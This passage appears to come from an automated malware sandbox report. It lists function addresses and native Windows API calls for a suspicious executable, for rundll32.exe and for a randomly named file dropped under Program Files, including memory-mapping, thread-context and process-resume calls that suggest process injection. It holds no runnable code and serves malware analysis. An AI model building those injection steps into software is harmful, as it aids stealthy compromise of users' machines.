          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA449638_2_00AA4496
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A14CD438_2_00A14CD4
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009F841F38_2_009F841F
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0243038_2_00A02430
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AAD46638_2_00AAD466
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0B47738_2_00A0B477
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AACC7738_2_00AACC77
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A165A038_2_00A165A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A1258138_2_00A12581
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA2D8238_2_00AA2D82
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB25DD38_2_00AB25DD
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009FD5E038_2_009FD5E0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB2D0738_2_00AB2D07
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_009E0D2038_2_009E0D20
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A02D5038_2_00A02D50
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB1D5538_2_00AB1D55
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A91EB638_2_00A91EB6
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB2EF738_2_00AB2EF7
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A106C038_2_00A106C0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A06E3038_2_00A06E30
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A0560038_2_00A05600
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AAD61638_2_00AAD616
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A6AE6038_2_00A6AE60
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AA67E238_2_00AA67E2
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00AB1FF138_2_00AB1FF1
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00ABDFCE38_2_00ABDFCE
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_0040635439_2_00406354
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_0040480239_2_00404802
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_00406B2B39_2_00406B2B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A420A040_2_00A420A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE20A840_2_00AE20A8
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A2B09040_2_00A2B090
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE28EC40_2_00AE28EC
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AEE82440_2_00AEE824
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3A83040_2_00A3A830
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A1680040_2_00A16800
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD100240_2_00AD1002
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A399BF40_2_00A399BF
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3412040_2_00A34120
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A1F90040_2_00A1F900
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE22AE40_2_00AE22AE
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE32A940_2_00AE32A9
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD4AEF40_2_00AD4AEF
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ADE2C540_2_00ADE2C5
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ACFA2B40_2_00ACFA2B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3B23640_2_00A3B236
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A4EBB040_2_00A4EBB0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ABEB8A40_2_00ABEB8A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A4138B40_2_00A4138B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3EB9A40_2_00A3EB9A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A68BE840_2_00A68BE8
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AC23E340_2_00AC23E3
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD03DA40_2_00AD03DA
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A4ABD840_2_00A4ABD8
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ADDBD240_2_00ADDBD2
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE2B2840_2_00AE2B28
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3A30940_2_00A3A309
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD231B40_2_00AD231B
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3336040_2_00A33360
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3AB4040_2_00A3AB40
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ABCB4F40_2_00ABCB4F
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD449640_2_00AD4496
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A2841F40_2_00A2841F
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ADD46640_2_00ADD466
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3B47740_2_00A3B477
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A465A040_2_00A465A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A4258140_2_00A42581
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD2D8240_2_00AD2D82
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A2D5E040_2_00A2D5E0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE25DD40_2_00AE25DD
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A10D2040_2_00A10D20
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE2D0740_2_00AE2D07
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A32D5040_2_00A32D50
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE1D5540_2_00AE1D55
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AC1EB640_2_00AC1EB6
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE2EF740_2_00AE2EF7
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A36E3040_2_00A36E30
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A3560040_2_00A35600
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00ADD61640_2_00ADD616
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AD67E240_2_00AD67E2
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AE1FF140_2_00AE1FF1
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00AEDFCE40_2_00AEDFCE
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: String function: 00AAB150 appears 45 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0533B150 appears 35 times
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: String function: 00A1B150 appears 154 times
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: String function: 00A75720 appears 85 times
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: String function: 00A6D08C appears 42 times
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: String function: 00AA5720 appears 50 times
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: String function: 009EB150 appears 177 times
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: String function: 00A3D08C appears 48 times
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004185F0 NtCreateFile,1_2_004185F0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004186A0 NtReadFile,1_2_004186A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00418720 NtClose,1_2_00418720
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004187D0 NtAllocateVirtualMemory,1_2_004187D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004185EB NtCreateFile,1_2_004185EB
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041869A NtReadFile,1_2_0041869A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041871A NtReadFile,NtClose,1_2_0041871A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004187CA NtAllocateVirtualMemory,1_2_004187CA
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AE98F0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AE9860
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9840 NtDelayExecution,LdrInitializeThunk,1_2_00AE9840
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE99A0 NtCreateSection,LdrInitializeThunk,1_2_00AE99A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AE9910
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9A20 NtResumeThread,LdrInitializeThunk,1_2_00AE9A20
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AE9A00
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,1_2_00AE9A50
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,1_2_00AE95D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,1_2_00AE9540
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AE96E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AE9660
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AE97A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AE9780
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AE9FE0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AE9710
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE98A0 NtWriteVirtualMemory,1_2_00AE98A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9820 NtEnumerateKey,1_2_00AE9820
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AEB040 NtSuspendThread,1_2_00AEB040
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE99D0 NtCreateProcessEx,1_2_00AE99D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9950 NtQueueApcThread,1_2_00AE9950
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9A80 NtOpenDirectoryObject,1_2_00AE9A80
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9A10 NtQuerySection,1_2_00AE9A10
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AEA3B0 NtGetContextThread,1_2_00AEA3B0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9B00 NtSetValueKey,1_2_00AE9B00
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE95F0 NtQueryInformationFile,1_2_00AE95F0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9520 NtWaitForSingleObject,1_2_00AE9520
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AEAD30 NtSetContextThread,1_2_00AEAD30
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9560 NtWriteFile,1_2_00AE9560
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE96D0 NtCreateKey,1_2_00AE96D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9610 NtEnumerateValueKey,1_2_00AE9610
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9670 NtQueryInformationProcess,1_2_00AE9670
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9650 NtQueryValueKey,1_2_00AE9650
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9730 NtQueryVirtualMemory,1_2_00AE9730
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AEA710 NtOpenProcessToken,1_2_00AEA710
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9760 NtOpenProcess,1_2_00AE9760
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE9770 NtSetInformationFile,1_2_00AE9770
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AEA770 NtOpenThread,1_2_00AEA770
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_004185F0 NtCreateFile,1_1_004185F0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_004186A0 NtReadFile,1_1_004186A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_00418720 NtClose,1_1_00418720
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_004187D0 NtAllocateVirtualMemory,1_1_004187D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_05379910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379540 NtReadFile,LdrInitializeThunk,13_2_05379540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053799A0 NtCreateSection,LdrInitializeThunk,13_2_053799A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053795D0 NtClose,LdrInitializeThunk,13_2_053795D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379860 NtQuerySystemInformation,LdrInitializeThunk,13_2_05379860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379840 NtDelayExecution,LdrInitializeThunk,13_2_05379840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379710 NtQueryInformationToken,LdrInitializeThunk,13_2_05379710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379B00 NtSetValueKey,LdrInitializeThunk,13_2_05379B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379780 NtMapViewOfSection,LdrInitializeThunk,13_2_05379780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379FE0 NtCreateMutant,LdrInitializeThunk,13_2_05379FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379610 NtEnumerateValueKey,LdrInitializeThunk,13_2_05379610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_05379660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379A50 NtCreateFile,LdrInitializeThunk,13_2_05379A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379650 NtQueryValueKey,LdrInitializeThunk,13_2_05379650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053796E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_053796E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053796D0 NtCreateKey,LdrInitializeThunk,13_2_053796D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0537AD30 NtSetContextThread,13_2_0537AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379520 NtWaitForSingleObject,13_2_05379520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379560 NtWriteFile,13_2_05379560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379950 NtQueueApcThread,13_2_05379950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053795F0 NtQueryInformationFile,13_2_053795F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053799D0 NtCreateProcessEx,13_2_053799D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379820 NtEnumerateKey,13_2_05379820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0537B040 NtSuspendThread,13_2_0537B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053798A0 NtWriteVirtualMemory,13_2_053798A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053798F0 NtReadVirtualMemory,13_2_053798F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379730 NtQueryVirtualMemory,13_2_05379730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0537A710 NtOpenProcessToken,13_2_0537A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379770 NtSetInformationFile,13_2_05379770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0537A770 NtOpenThread,13_2_0537A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379760 NtOpenProcess,13_2_05379760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0537A3B0 NtGetContextThread,13_2_0537A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053797A0 NtUnmapViewOfSection,13_2_053797A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379A20 NtResumeThread,13_2_05379A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379A10 NtQuerySection,13_2_05379A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379A00 NtProtectVirtualMemory,13_2_05379A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379670 NtQueryInformationProcess,13_2_05379670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05379A80 NtOpenDirectoryObject,13_2_05379A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_010685F0 NtCreateFile,13_2_010685F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01068720 NtClose,13_2_01068720
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_010687D0 NtAllocateVirtualMemory,13_2_010687D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_010686A0 NtReadFile,13_2_010686A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_010685EB NtCreateFile,13_2_010685EB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106871A NtReadFile,NtClose,13_2_0106871A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_010687CA NtAllocateVirtualMemory,13_2_010687CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106869A NtReadFile,13_2_0106869A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29860 NtQuerySystemInformation,LdrInitializeThunk,38_2_00A29860
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,38_2_00A29910
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A295D0 NtClose,LdrInitializeThunk,38_2_00A295D0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,38_2_00A296E0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29660 NtAllocateVirtualMemory,LdrInitializeThunk,38_2_00A29660
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29FE0 NtCreateMutant,LdrInitializeThunk,38_2_00A29FE0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A298A0 NtWriteVirtualMemory,38_2_00A298A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A298F0 NtReadVirtualMemory,38_2_00A298F0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29820 NtEnumerateKey,38_2_00A29820
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A2B040 NtSuspendThread,38_2_00A2B040
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29840 NtDelayExecution,38_2_00A29840
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A299A0 NtCreateSection,38_2_00A299A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A299D0 NtCreateProcessEx,38_2_00A299D0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29950 NtQueueApcThread,38_2_00A29950
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29A80 NtOpenDirectoryObject,38_2_00A29A80
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29A20 NtResumeThread,38_2_00A29A20
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29A00 NtProtectVirtualMemory,38_2_00A29A00
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29A10 NtQuerySection,38_2_00A29A10
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29A50 NtCreateFile,38_2_00A29A50
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A2A3B0 NtGetContextThread,38_2_00A2A3B0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29B00 NtSetValueKey,38_2_00A29B00
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A295F0 NtQueryInformationFile,38_2_00A295F0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29520 NtWaitForSingleObject,38_2_00A29520
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A2AD30 NtSetContextThread,38_2_00A2AD30
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29560 NtWriteFile,38_2_00A29560
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29540 NtReadFile,38_2_00A29540
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A296D0 NtCreateKey,38_2_00A296D0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29610 NtEnumerateValueKey,38_2_00A29610
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29670 NtQueryInformationProcess,38_2_00A29670
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29650 NtQueryValueKey,38_2_00A29650
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A297A0 NtUnmapViewOfSection,38_2_00A297A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29780 NtMapViewOfSection,38_2_00A29780
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29730 NtQueryVirtualMemory,38_2_00A29730
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A2A710 NtOpenProcessToken,38_2_00A2A710
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29710 NtQueryInformationToken,38_2_00A29710
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29760 NtOpenProcess,38_2_00A29760
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A2A770 NtOpenThread,38_2_00A2A770
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A29770 NtSetInformationFile,38_2_00A29770
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,40_2_00A59860
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,40_2_00A59910
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A595D0 NtClose,LdrInitializeThunk,40_2_00A595D0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,40_2_00A596E0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,40_2_00A59660
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,40_2_00A59FE0
